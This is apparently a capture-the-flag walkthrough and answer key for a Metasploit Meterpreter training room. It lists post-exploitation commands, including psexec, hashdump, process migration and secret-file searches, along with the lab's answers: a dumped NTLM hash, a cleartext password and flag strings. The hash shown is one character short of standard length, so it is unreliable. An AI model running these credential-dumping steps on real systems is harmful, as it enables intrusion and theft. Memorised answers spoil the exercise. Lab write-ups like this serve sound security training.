Skip to content

Metasploit: Meterpreter Banner

Metasploit: Meterpreter Logo

Metasploit: Meterpreter

This guide contains the answer and steps necessary to get to them for the Metasploit: Meterpreter room.

Post-Exploitation Challenge

sysinfo
exploit/windows/smb/psexec
post/windows/gather/enum_shares
hashdump
migrate 752
hashdump
search -f secrets.txt
cat "c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt"
search -f realsecret.txt
cat "c:\inetpub\wwwroot\realsecret.txt"

  1. What is the computer name?

Click for answerACME-TEST

  1. What is the target domain?

Click for answerFLASH

  1. What is the name of the share likely created by the user?

Click for answerspeedster

  1. What is the NTLM hash of the jchambers user?

Click for answer69596c7aa1e8daee17f8e78870e25a5

  1. What is the cleartext password of the jchambers user?

Click for answerTrustno1

  1. Where is the "secrets.txt" file located?

Click for answerc:\Program Files (x86)\Windows Multimedia Platform

  1. What is the Twitter password revealed in the "secrets.txt" file?

Click for answerKDSvbsw3849!

  1. Where is the "realsecret.txt" file located?

Click for answerc:\inetpub\wwwroot

  1. What is the real secret?

Click for answerThe Flash is the fastest man alive